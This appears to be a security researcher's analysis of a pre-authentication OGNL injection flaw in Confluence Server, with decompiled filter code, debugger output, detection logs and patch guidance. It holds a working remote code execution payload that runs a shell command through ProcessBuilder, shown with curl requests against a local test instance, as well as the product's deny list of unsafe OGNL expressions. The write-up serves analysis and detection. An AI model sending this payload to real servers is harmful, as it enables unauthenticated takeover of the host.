java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.base/java.lang.Thread.run(Thread.java:829) \--------------------------------------/
https://confluence.atlassian.com/doc/configuring-logging-181535215.html
Analyzing the vulnerability
package com.opensymphony.webwork.util; import com.opensymphony.xwork.util.OgnlUtil; import java.util.Collections; import java.util.HashSet; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import ognl.Node; import ognl.OgnlException; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; public class SafeExpressionUtil { private static final Set SAFE_EXPRESSIONS_CACHE = Collections.newSetFromMap(new ConcurrentHashMap<Object, Boolean>()); private static final Log log = LogFactory.getLog(SafeExpressionUtil.class); private static final Set UNSAFE_NODE_TYPES; private static final Set UNSAFE_PROPERTY_NAMES; static { Set<String> set3 = new HashSet(); set3.add("ognl.ASTStaticMethod"); set3.add("ognl.ASTStaticField"); set3.add("ognl.ASTCtor"); set3.add("ognl.ASTAssign"); UNSAFE_NODE_TYPES = Collections.unmodifiableSet(set3); Set<String> set2 = new HashSet(); set2.add("class"); set2.add("classLoader"); UNSAFE_PROPERTY_NAMES = Collections.unmodifiableSet(set2); Set<String> set1 = new HashSet(); set1.add("getClass()"); set1.add("getClassLoader()"); UNSAFE_METHOD_NAMES = Collections.unmodifiableSet(set1); Set<String> set = new HashSet(); set.add("#_memberAccess"); set.add("#context"); set.add("#request"); set.add("#parameters"); set.add("#session"); set.add("#application"); UNSAFE_VARIABLE_NAMES = Collections.unmodifiableSet(set); } private static final Set UNSAFE_METHOD_NAMES; private static final Set UNSAFE_VARIABLE_NAMES; public static boolean isSafeExpression(String expression) { if (!SAFE_EXPRESSIONS_CACHE.contains(expression)) { try { Object parsedExpression = OgnlUtil.compile(expression); if (parsedExpression instanceof Node) { if (containsUnsafeExpression((Node)parsedExpression)) { String message = "Unsafe clause found in [" + expression + "]"; log.warn(message); } else { SAFE_EXPRESSIONS_CACHE.add(expression); } } } catch (OgnlException ex) { log.debug("Cannot verify safety of OGNL expression", (Throwable)ex); } } return SAFE_EXPRESSIONS_CACHE.contains(expression); } private static boolean containsUnsafeExpression(Node node) { String nodeClassName = node.getClass().getName(); if (UNSAFE_NODE_TYPES.contains(nodeClassName)) return true; if ("ognl.ASTProperty".equals(nodeClassName) && UNSAFE_PROPERTY_NAMES.contains(node.toString())) return true; if ("ognl.ASTMethod".equals(nodeClassName) && UNSAFE_METHOD_NAMES.contains(node.toString())) return true; if ("ognl.ASTVarRef".equals(nodeClassName) && UNSAFE_VARIABLE_NAMES.contains(node.toString())) { return true; } for (int i = 0; i < node.jjtGetNumChildren(); i++) { Node childNode = node.jjtGetChild(i); if (childNode != null && containsUnsafeExpression(childNode)) { return true; } } return false; } }
package com.opensymphony.webwork.util; import com.opensymphony.xwork.util.OgnlValueStack; public interface OgnlValueFinder { Object findValue(String paramString); Object findValue(String paramString, Class paramClass); public static class Factory { public static OgnlValueFinder forStack(OgnlValueStack stack) { return forStack(stack, true); } private static OgnlValueFinder forStack(final OgnlValueStack stack, final boolean rejectUnsafeExpressions) { return new OgnlValueFinder() { public Object findValue(String expr) { if (rejectUnsafeExpressions && SafeExpressionUtil.isSafeExpression(expr)) { return stack.findValue(expr); } return null; } public Object findValue(String expr, Class asType) { if (rejectUnsafeExpressions && SafeExpressionUtil.isSafeExpression(expr)) { return stack.findValue(expr, asType); } return null; } }; } } }
Checking for the vulnerability
wvu@kharak:~$ curl -vs http://127.0.0.1:8090/pages/createpage-entervariables.action --data-urlencode queryString='foo\u0027+\u0027bar\u0027+\u0027baz' | rg -w foobarbaz * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 8090 (#0) > POST /pages/createpage-entervariables.action HTTP/1.1 > Host: 127.0.0.1:8090 > User-Agent: curl/7.64.1 > Accept: */* > Content-Length: 59 > Content-Type: application/x-www-form-urlencoded > } [59 bytes data] * upload completely sent off: 59 out of 59 bytes < HTTP/1.1 200 < Cache-Control: no-store < Expires: Thu, 01 Jan 1970 00:00:00 GMT < X-Confluence-Request-Time: 1630525698836 < Set-Cookie: JSESSIONID=6121C7C3B3C99B91F58E35367FF773C8; Path=/; HttpOnly < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < X-Frame-Options: SAMEORIGIN < Content-Security-Policy: frame-ancestors 'self' < X-Accel-Buffering: no < Content-Type: text/html;charset=UTF-8 < Transfer-Encoding: chunked < Date: Wed, 01 Sep 2021 19:48:23 GMT < { [7722 bytes data] name="queryString" value="foobarbaz" /> * Connection #0 to host 127.0.0.1 left intact * Closing connection 0 wvu@kharak:~$
https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html
https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341
Breakpoint hit: "thread=http-nio-8090-exec-1", com.opensymphony.webwork.util.SafeExpressionUtil.isSafeExpression(), line=69 bci=12 69 Object parsedExpression = OgnlUtil.compile(expression); http-nio-8090-exec-1[1] print expression expression = "'foo\u0027+\u0027bar\u0027+\u0027baz'" http-nio-8090-exec-1[1] list 65 66 public static boolean isSafeExpression(String expression) { 67 if (!SAFE_EXPRESSIONS_CACHE.contains(expression)) { 68 try { 69 => Object parsedExpression = OgnlUtil.compile(expression); 70 if (parsedExpression instanceof Node) { 71 if (containsUnsafeExpression((Node)parsedExpression)) { 72 String message = "Unsafe clause found in [" + expression + "]"; 73 log.warn(message); 74 } else { http-nio-8090-exec-1[1] next > Step completed: "thread=http-nio-8090-exec-1", com.opensymphony.webwork.util.SafeExpressionUtil.isSafeExpression(), line=70 bci=17 70 if (parsedExpression instanceof Node) { http-nio-8090-exec-1[1] print parsedExpression parsedExpression = ""foo" + "bar" + "baz"" http-nio-8090-exec-1[1]
Exploiting the vulnerability
'+Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval('new java.lang.ProcessBuilder("/bin/sh","-c","touch /tmp/vulnerable").start()')+'
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el—-code-execution
https://www.tutorialspoint.com/java/lang/class_forname_loader.htm
https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html
wvu@kharak:~$ curl -vs http://127.0.0.1:8090/pages/createpage-entervariables.action --data-urlencode queryString='\u0027+Class.forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0027new java.lang.ProcessBuilder(\u0022/bin/sh\u0022,\u0022-c\u0022,\u0022touch /tmp/vulnerable\u0022).start()\u0027)+\u0027' | rg -w queryString * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 8090 (#0) > POST /pages/createpage-entervariables.action HTTP/1.1 > Host: 127.0.0.1:8090 > User-Agent: curl/7.64.1 > Accept: */* > Content-Length: 328 > Content-Type: application/x-www-form-urlencoded > } [328 bytes data] * upload completely sent off: 328 out of 328 bytes < HTTP/1.1 200 < Cache-Control: no-store < Expires: Thu, 01 Jan 1970 00:00:00 GMT < X-Confluence-Request-Time: 1630714538886 < Set-Cookie: JSESSIONID=EA879E487C9FE99984FDE7066111D9CB; Path=/; HttpOnly < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < X-Frame-Options: SAMEORIGIN < Content-Security-Policy: frame-ancestors 'self' < X-Accel-Buffering: no < Content-Type: text/html;charset=UTF-8 < Transfer-Encoding: chunked < Date: Sat, 04 Sep 2021 00:15:39 GMT < { [7722 bytes data] name="queryString" value="Process[pid=70491, exitValue="not exited"]" /> * Connection #0 to host 127.0.0.1 left intact * Closing connection 0 wvu@kharak:~$
root@1abf17cfd2d2:~# ls -l /tmp/vulnerable -rw-r----- 1 confluence confluence 0 Sep 4 00:15 /tmp/vulnerable root@1abf17cfd2d2:~#
Detecting the exploit
POST /pages/createpage-entervariables.action HTTP/1.1 Host: 127.0.0.1:8090 User-Agent: curl/7.64.1 Accept: */* Content-Length: 328 Content-Type: application/x-www-form-urlencoded Connection: close queryString=%5Cu0027%2BClass.forName%28%5Cu0022javax.script.ScriptEngineManager%5Cu0022%29.newInstance%28%29.getEngineByName%28%5Cu0022js%5Cu0022%29.eval%28%5Cu0027new%20java.lang.ProcessBuilder%28%5Cu0022%2Fbin%2Fsh%5Cu0022%2C%5Cu0022-c%5Cu0022%2C%5Cu0022touch%20%2Ftmp%2Fvulnerable%5Cu0022%29.start%28%29%5Cu0027%29%2B%5Cu0027
==> /var/atlassian/application-data/confluence/analytics-logs/e8b49a07d45fda45c7a7945b897c6efb.atlassian-analytics.log <== 1.8|2021-09-08 02:35:41,555|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.shared-drafts.draftCreated|{}|1631068541555|[redacted]|9895d158ce2b36b007b9eb4734b9ad13|analytics|| 1.8|2021-09-08 02:35:41,673|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|velocity16.web.panel.render.time|{"atlassianPlugin":true,"templateName":1438140996,"analyticEventVersion":1,"pluginKeyResponsible":424488225,"renderTimeMilliseconds":1,"renderExceptionThrown":false}|1631068541673|[redacted]|9895d158ce2b36b007b9eb4734b9ad13|templaterenderer.velocity.one.six.internal|| 1.8|2021-09-08 02:35:41,675|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|velocity16.web.panel.render.time|{"atlassianPlugin":true,"templateName":1841481137,"analyticEventVersion":1,"pluginKeyResponsible":602150503,"renderTimeMilliseconds":1,"renderExceptionThrown":false}|1631068541675|[redacted]|9895d158ce2b36b007b9eb4734b9ad13|templaterenderer.velocity.one.six.internal|| 1.8|2021-09-08 02:35:41,715|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|soy.web.panel.render.time|{"atlassianPlugin":true,"renderTimeMilliseconds":0,"webPanel":4219233039,"analyticEventVersion":1,"pluginKeyResponsible":602150503}|1631068541715|[redacted]|9895d158ce2b36b007b9eb4734b9ad13|soy.impl.webpanel|| 1.8|2021-09-08 02:35:41,724|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":true,"renderTimeMilliseconds":47,"webPanelLocation":"templates/atlassian-editor.vm","analyticEventVersion":1,"pluginKeyResponsible":433867481}|1631068541724|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,737|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":true,"renderTimeMilliseconds":0,"webPanelLocation":"/template/synchrony-token.vm","analyticEventVersion":1,"pluginKeyResponsible":2608662105}|1631068541737|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,742|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":true,"renderTimeMilliseconds":1,"webPanelLocation":"/templates/editor-settings.vm","analyticEventVersion":1,"pluginKeyResponsible":602150503}|1631068541742|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,788|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":true,"renderTimeMilliseconds":0,"webPanelLocation":"templates/date-header.vm","analyticEventVersion":1,"pluginKeyResponsible":3497139435}|1631068541788|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,842|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":false,"renderTimeMilliseconds":4,"webPanelLocation":"#menuMacros_renderAuiHelpMenu()","analyticEventVersion":1,"pluginKeyResponsible":2332905261}|1631068541842|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,848|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":false,"renderTimeMilliseconds":0,"webPanelLocation":"#menuMacros_renderAuiAdminMenu()","analyticEventVersion":1,"pluginKeyResponsible":2332905261}|1631068541848|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,856|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":false,"renderTimeMilliseconds":0,"webPanelLocation":"#menuMacros_renderHeaderWorkDayLink()","analyticEventVersion":1,"pluginKeyResponsible":2332905261}|1631068541856|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,866|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":false,"renderTimeMilliseconds":1,"webPanelLocation":"#menuMacros_renderAuiUserMenu()","analyticEventVersion":1,"pluginKeyResponsible":2332905261}|1631068541866|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,879|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|soy.web.panel.render.time|{"atlassianPlugin":true,"renderTimeMilliseconds":0,"webPanel":311965510,"analyticEventVersion":1,"pluginKeyResponsible":2354996824}|1631068541879|[redacted]|9895d158ce2b36b007b9eb4734b9ad13|soy.impl.webpanel|| 1.8|2021-09-08 02:35:41,886|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b|-11374374|confluence.web.panel.render.time|{"atlassianPlugin":false,"renderTimeMilliseconds":3,"webPanelLocation":"/decorators/includes/footer.vm","analyticEventVersion":1,"pluginKeyResponsible":2332905261}|1631068541886|[redacted]|9895d158ce2b36b007b9eb4734b9ad13||| 1.8|2021-09-08 02:35:41,891|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b||confluence.decorator.metrics|{"decorator.root.elapsedMillis":193,"decorator.main.invocationCount":1,"decorator.page.invocationCount":1,"decorator.main.elapsedMillis":121,"decorator.root.invocationCount":1,"decorator.page.elapsedMillis":16,"decoratorNames":""}|1631068541891|[redacted]||impl.profiling|| 1.8|2021-09-08 02:35:41,899|6c02c4e7e81604d7992b7468693203c5|confluence|7.12.4|42780a27d778f578850e6a8af52b483b||confluence.http.request.stats|{"requestUserTime":190,"reqTime":349,"timingEventKeys":"","url":"","requestGCDuration":0,"dbReqFinishTimes":"","reqStartTime":1631068541540,"requestCorrelationId":"","requestCpuTime":247,"requestGCCount":0,"dbReqTimesInMicros":"","key":"confluence.page.create.view","timingEventMillis":"208,211,211,211,211,211,211,213,219,225,227,229,260,288,291,292,333,333,336,346,346,349"}|1631068541899|[redacted]||analytics|| ==> /var/atlassian/application-data/confluence/logs/atlassian-confluence.log <== 2021-09-08 02:35:41,733 ERROR [http-nio-8090-exec-13] [confluence.plugins.synchrony.SynchronyContextProvider] getContextMap -- url: /pages/createpage-entervariables.action | traceId: 0625e0888c0b5b60 | userName: anonymous | action: createpage-entervariables
Guidance
Confluence Server and Confluence Data Center customers should update to one of the following fixed versions on an emergency basis, without waiting for a regular patch cycle:
- 6.13.23
- 7.4.11
- 7.11.6
- 7.12.5
- 7.13.0
References
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
- https://jira.atlassian.com/browse/CONFSERVER-67940
- https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
- https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455
- https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6
- https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/
